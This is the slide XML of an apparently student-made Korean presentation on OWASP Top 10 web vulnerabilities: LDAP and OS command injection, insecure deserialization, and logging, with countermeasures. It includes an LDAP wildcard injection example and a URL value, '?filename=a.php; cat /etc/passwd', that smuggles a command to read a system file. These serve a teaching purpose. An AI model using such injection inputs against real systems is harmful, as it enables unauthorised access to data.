              <a:off x="8315281" y="2207590"/>
              <a:ext cx="292104" cy="416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7973809" y="4247591"/>
              <a:ext cx="256576" cy="816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endCxn id="98" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6329032" y="4247591"/>
              <a:ext cx="105598" cy="9107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239545" y="1398456"/>
              <a:ext cx="3611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dc=database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222636" y="2660868"/>
              <a:ext cx="17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ou</a:t>
              </a:r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=manager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6227595" y="3586712"/>
              <a:ext cx="720813" cy="6993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645865" y="2545014"/>
              <a:ext cx="17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ou</a:t>
              </a:r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=people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421959" y="3300498"/>
              <a:ext cx="17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ou</a:t>
              </a:r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=member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56400" y="3242954"/>
              <a:ext cx="17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ou</a:t>
              </a:r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=guest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4326" y="4822587"/>
              <a:ext cx="164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uid</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR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=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1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madmax</a:t>
              </a:r>
              <a:endPara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7017085" y="5965880"/>
            <a:ext cx="597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LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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에서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r>
              <a:rPr lang="ko-KR" altLang="ko-KR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디렉토리의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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구조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16ABE-6ADB-4C8C-AFC0-0C8867ED355A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2D3C4-4480-43FF-BE1A-59207D149CB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A405CD-0970-4E12-9102-283D36E60B8E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LDAP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란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?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417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ㅇ 직렬화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(Serialization) : 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객체를 직렬화하여 전송 가능한 형태로 만드는 것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    (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객체들의 데이터를 연속적인 데이터로 변형하여 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Stream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을 통해 데이터를 읽도록 해주며 주로 객체들을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     통째로 파일로 저장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전송하고 싶을 때 주로 사용된다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.)</a:t>
            </a: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ㅇ 역직렬화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(Deserialization) : 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직렬화된 파일 등을 역으로 직렬화하여 다시 객체의 형태로 만드는 것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    (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저장된 파일을 읽거나 전송된 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Stream </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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데이터를 읽어 원래 객체의 형태로 복원한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:br>
              <a:rPr lang="ko-KR" altLang="en-US" sz="240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</a:br>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="240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878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와 역직렬화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(Unserialization)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D7BDF-B044-4281-AD82-690FFA1AC169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90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878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와 역직렬화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(Unserialization)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483718-8A50-45C2-9E7A-B63EDEBE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4" y="2283129"/>
            <a:ext cx="6766956" cy="3890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39DD2-C413-40F9-B6B8-BD55DBC6CC7A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E7C2D2-F51F-4ECE-A3B7-002D236DB3E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7457440" y="288455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직렬화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스트림에 객체 출력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</a:p>
          <a:p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-&gt; ObjectOutputStream</a:t>
            </a:r>
          </a:p>
          <a:p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    </a:t>
            </a:r>
          </a:p>
          <a:p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역직렬화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스트림으로부터 객체를 입력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</a:p>
          <a:p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-&gt; ObjectInputStream</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:b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</a:br>
            <a:endParaRPr lang="en-US" altLang="ko-KR">
              <a:solidFill>
                <a:srgbClr val="666666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>
              <a:solidFill>
                <a:srgbClr val="666666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>
              <a:solidFill>
                <a:srgbClr val="666666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Object obj = new Object() =&gt; </a:t>
            </a:r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직렬화 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x</a:t>
            </a:r>
          </a:p>
          <a:p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Object obj = new Object("abc") =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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직렬화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="666666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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="a고딕11" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="a고딕11" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:latin typeface="a고딕11" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="a고딕11" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ko-KR" altLang="en-US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612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3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공격자는 직렬화된 객체를 변경하여 아래와 같이 관리자 권한을 부여한다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0E71E-71A6-4D0A-A7E5-2911FBE6EF0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631494" y="1499859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공격 시나리오에서 사용되는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43F9D-0CE8-4CD1-BE0C-7F05EBA8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37" y="2541486"/>
            <a:ext cx="6425523" cy="9553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A0B000-31EB-4AFB-A026-3FB2847F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37" y="4783789"/>
            <a:ext cx="6425523" cy="1089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4AA0E-D1C2-47C9-89B4-73AE640294F8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839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3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악성 객체 생성이나 데이터 변조를 방지하기 위해서 직렬화된 객체에 대한</a:t>
            </a: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디지털 서명과 같은 무결성 검사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구현해야 한다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2)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객체 생성 전 코드가 일반적으로 정의할 수 </a:t>
            </a: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있는 클래스 집합을 요구하기 때문에</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight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역직렬화하는 동안 엄격한 형식 제약 조건을 적용한다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3)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예상하지 않은 형식이 들어올 경우나 </a:t>
            </a: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역직렬화가 예외를 생성할 경우에</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight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예외나 실패에 대한 로그를 남긴다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0E71E-71A6-4D0A-A7E5-2911FBE6EF0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631494" y="1499859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>
                <a:latin typeface="a고딕15" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="a고딕15" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>안전하지 않은 역직렬화 보안 대책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C6CE5-66A8-4535-AD33-8DEC614665FF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953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3F62B-7384-4C4C-92FC-BAEF1CA37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78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C9707-C48B-4E68-A4BE-B04A18BF4ED6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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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발표 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" spc="3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들어주셔서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR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 감사합니다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.”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2800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36535-34CC-46AC-A60E-9C1886F0E692}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="960664" y="3690610"/>
            <a:ext cx="887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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="20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마동석</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40792207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3589A-002F-4172-B448-9E54DC1B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1" y="0"/>
            <a:ext cx="122194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00678-6B89-4960-8AFB-8D2EFE2D8FE1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질문 받겠습니다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9E4C-B17A-46F7-8F8F-86D274902F2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="960664" y="3690610"/>
            <a:ext cx="887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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="20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질문자는 진실의 방으로＂</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3764248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E0AC0-648E-4A64-91ED-B71036172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3CE54-1043-4511-8B7B-3B19E5DFB795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A+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" spc="3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좀 부탁드립니다 교수님</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" spc="30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2800" spc="300" dirty="0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136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05480-D7A2-463F-95B1-CEFDDF9A6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B81B3-0F4E-4206-AACB-BC72396E539C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21108990">
            <a:off x="1139388" y="3363513"/>
            <a:ext cx="8619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TO BE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="80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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="8000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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="80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      CONTINUE</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="8000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0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90667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20436" y="1987274"/>
            <a:ext cx="9989128" cy="8728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Searchfilter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=“(</a:t>
            </a:r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cn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=“+user+”)”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20436" y="2950202"/>
            <a:ext cx="9989128" cy="8728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http://www.example.com/ldapserach?user=John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0436" y="3976582"/>
            <a:ext cx="9989128" cy="8728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http://www.example.com/ldapserach?user=*</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1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20436" y="5029603"/>
            <a:ext cx="9989128" cy="8728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Searchfilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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=“(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1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cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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=*)”</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1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4D95A-121A-4A8F-B981-1201762CD19F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8F735-9E8A-4667-A20C-5007F657934A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CACD-258F-4505-933E-458671E56140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LDAP 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 시나리오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3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5" y="1290667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B9527-12B4-4126-B08B-788FA49F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70" y="1730692"/>
            <a:ext cx="9803459" cy="2843003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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DFBC672B-57D4-42DC-9263-09859F35D548}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1912906" y="4408045"/>
            <a:ext cx="7565571" cy="176484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3600" i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?filename=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" i="1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a.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" i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; cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" i="1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etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" i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/passwd</a:t>
            </a:r>
            <a:b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6062-AD99-4AE5-A17C-24E6DA3E7D36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51781-9BCF-4A94-A2E0-4EBEB1BFAB5A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CB7ED-3316-46C2-A77B-24EE75240E99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OS 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 시나리오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5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48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Picture 4" descr="https://t1.daumcdn.net/cfile/tistory/260B0A3359247BB80E">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DA4D194-F55D-4E45-945D-B7513134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74" y="1301650"/>
            <a:ext cx="6708451" cy="51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52608-5C2D-402C-8E08-21419B288C3B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57F54-F8A7-41AA-87F2-E7811B2D9520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8D909-4FE4-4251-9991-57D0415322E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330329" y="1361358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OS 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 결과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5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48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52608-5C2D-402C-8E08-21419B288C3B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57F54-F8A7-41AA-87F2-E7811B2D9520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8D909-4FE4-4251-9991-57D0415322E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="505097" y="1361358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 대책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78603-5B11-4CE5-B184-62E2F568F0A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="795130" y="2120347"/>
            <a:ext cx="9912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입력 문자열에 대한 검사를 철저히 한다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외부 입력 값에 대한 특수문자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(=, +, &lt;, &gt;, #, ;, \ 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등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필터링한다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</a:p>
          <a:p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- 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특수문자 이스케이프 처리</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2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저장프로시저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이용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2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-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저장 프로시저는 사용하자고 하는 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Query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 미리 형식을 지정하는 것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지정된 형식의 데이터가 아니면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2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 실행되지 않기 때문에 보안성을 크게 향상</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="243984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9F328D-F9DA-4726-9C79-A0B2F2478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44A21B-53BC-4849-881B-D483CAA8CAE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1657350" y="3182380"/>
            <a:ext cx="887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A10. Insufficient Logging &amp; Monitoring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CCCD9-9EEB-4FE5-AA2F-B064CE61EEE8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71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B65C5-23CB-496A-A71C-92652EBCC3F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331755" y="434459"/>
            <a:ext cx="90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Insufficient Logging &amp; Monitoring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70A97-1824-4AC3-8602-CC1B0B64DD5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CHAPTER 03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06" y="1853798"/>
            <a:ext cx="10085130" cy="4550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DF802-A453-43D8-93DB-AB689C44E9D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="505097" y="1361358"/>
            <a:ext cx="52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Insufficient Logging &amp; Monitoring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5786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F8E7D-540A-4B07-9C79-5CDBE1CB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BD17C-FFDB-4917-925D-56C42163CB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331755" y="434459"/>
            <a:ext cx="90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Insufficient Logging &amp; Monitoring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01EA-F12E-4E48-81A5-2CB4744C2AF5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CHAPTER 03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93D67-F74C-415F-BDE0-5AF99C75DD84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060B-8030-448E-A40E-2A94471F1FE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="505097" y="1361358"/>
            <a:ext cx="63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Insufficient Logging &amp; Monitoring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사례</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 4" descr="https://image.ahnlab.com/comm/info/1406278541429095.JPG">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{859DAF5A-73BE-4BD1-B63A-58BDA686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59" y="1869004"/>
            <a:ext cx="8201415" cy="4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3E388-2140-4B29-A1A3-6262B030622E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1455706" y="5865558"/>
            <a:ext cx="9236875" cy="7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53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F8E7D-540A-4B07-9C79-5CDBE1CB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BD17C-FFDB-4917-925D-56C42163CB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331755" y="434459"/>
            <a:ext cx="90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Insufficient Logging &amp; Monitoring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01EA-F12E-4E48-81A5-2CB4744C2AF5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CHAPTER 03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93D67-F74C-415F-BDE0-5AF99C75DD84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060B-8030-448E-A40E-2A94471F1FE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="505097" y="1361358"/>
            <a:ext cx="63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Insufficient Logging &amp; Monitoring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3E388-2140-4B29-A1A3-6262B030622E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1455706" y="5865558"/>
            <a:ext cx="9236875" cy="7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래픽 9" descr="문서">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98EE9581-77FB-4C6D-9877-3253A81D0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3773" y="3585908"/>
            <a:ext cx="1955799" cy="195579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1F93B64-4B4E-4ECB-834A-386D4E1E523F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3704740" y="2691732"/>
            <a:ext cx="4301067" cy="860172"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF99CC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B71679-16B8-4D39-BD4E-2304A67B233C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1935594" y="2404533"/>
            <a:ext cx="1626726" cy="1481666"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF99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9D529D-10E1-44FE-96C0-251F253358EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8148227" y="2404533"/>
            <a:ext cx="1626726" cy="1481666"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF99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13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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="폭발: 14pt 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFA5860C-917F-4933-B10D-3719F1862036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4043774" y="2935573"/>
            <a:ext cx="2387600" cy="1725102"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2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870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만건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9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F8E7D-540A-4B07-9C79-5CDBE1CB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BD17C-FFDB-4917-925D-56C42163CB70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331755" y="434459"/>
            <a:ext cx="90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Insufficient Logging &amp; Monitoring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01EA-F12E-4E48-81A5-2CB4744C2AF5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CHAPTER 03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A8AE6-F478-4032-B070-EE9C746C4A1D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060B-8030-448E-A40E-2A94471F1FE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="505097" y="1361358"/>
            <a:ext cx="63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Insufficient Logging &amp; Monitoring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필요성</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="apac dwell timeì ëí ì´ë¯¸ì§ ê²ìê²°ê³¼">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C02CB1-E06A-43CC-AAB3-8C1983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9" y="1839099"/>
            <a:ext cx="5746907" cy="44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폭발: 14pt 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28A10C2D-C42A-47F9-BF74-B103535B2350}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="522068">
            <a:off x="7060561" y="1987244"/>
            <a:ext cx="3684105" cy="2716696"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF99CC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87%</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="36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20" name="그래픽 19" descr="돋보기">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE01DCB6-4CDF-4260-A89E-925E1A8E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1891" y="3463494"/>
            <a:ext cx="2287067" cy="228706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D9EC6F8-C1EF-4941-8E06-6A6494352787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8931965" y="3776870"/>
            <a:ext cx="1205948" cy="11901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3%</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3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08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0C91B-FB89-46DA-8DBB-D2309BE2E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E9AA48-8B27-47FA-B774-547A62C36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11893-0BEA-4BE8-BE5F-6EE0F6625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0A2A0E-AFDE-46E7-A49E-DA8EB5A244A5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CE8EC-AA06-48B3-BB8A-254CEF783C37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OWASP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71FC-9EC3-49A3-A5F6-239C62069480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01.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8D37DF-C41C-4ED1-8E4C-3D03FA0DB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2" y="2196341"/>
            <a:ext cx="5408018" cy="238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36D1C-4623-45AB-9809-450C6BBEDCE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6262931" y="2252735"/>
            <a:ext cx="5652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오픈소스 웹 어플리케이션 보안 프로젝트</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="20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en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:latin typeface="a고딕17" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
                <a:ea typeface="a고딕17" panose="02020600000000000000" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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전 세계 보안전문가들이 보안 취약점 진단 기준과 표준을 수립하고</a:t>
            </a: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웹 어플리케이션 보안 관련 문서를 배포하고 보안 취약점 관련 툴을 개발하는 오픈소스 커뮤니티</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2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424F3-7A08-49AA-B7FF-01E3FA30D2FB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OWASP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84021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DCF897-E80A-47A8-8248-FD7982976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9D6080-62A5-4085-98E7-5AE2B563F85A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A2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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6827A-A76F-4BBE-9762-63FC1C49B625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27A7F6-47D0-4B4E-8088-471358CA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1640542"/>
            <a:ext cx="10080000" cy="4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7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2402-6D1C-435A-BA4D-72E91F8FFA86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&amp;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쿠키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26390A-1899-4254-B906-F8958233CC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4731" y="2501900"/>
          <a:ext cx="9949533" cy="3117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901">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3789950893"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4326316">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3900165704"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4326316">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="573304674"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="4832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경기천년제목OTF Bold" panose="02020803020101020101" pitchFamily="18" charset="-127"/>
                        <a:ea typeface="경기천년제목OTF Bold" panose="020208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세션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쿠키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898335"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="83407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경기천년제목OTF Bold" panose="02020803020101020101" pitchFamily="18" charset="-127"/>
                        <a:ea typeface="경기천년제목OTF Bold" panose="020208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클라이언트와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서버간에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 네트워크 연결이 지속적으로 유지하기 위해 세션 인증 키 사용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클라이언트 쪽에 상태정보를 저장하는 패킷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341892"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="483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클라이언트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세션 인증 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유저 정보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802173"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="483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서버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유저 정보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無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944151"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="834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유지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웹브라우저를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 닫거나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경기천년제목OTF Bold" panose="02020803020101020101" pitchFamily="18" charset="-127"/>
                        <a:ea typeface="경기천년제목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서버에서 설정한 시간 초과 시 소멸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제목OTF Bold" panose="02020803020101020101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="경기천년제목OTF Bold" panose="02020803020101020101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>쿠키를 지우지 않으면 영구적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48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5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2402-6D1C-435A-BA4D-72E91F8FFA86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토큰의 취약점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C6083-D412-4792-B0DF-07C14823D9CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1309816" y="2035933"/>
            <a:ext cx="3543222" cy="4384676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="381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서버">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BBF4AB7-B453-4263-880B-831C57592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76" y="2625277"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="그래픽 12" descr="서버">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
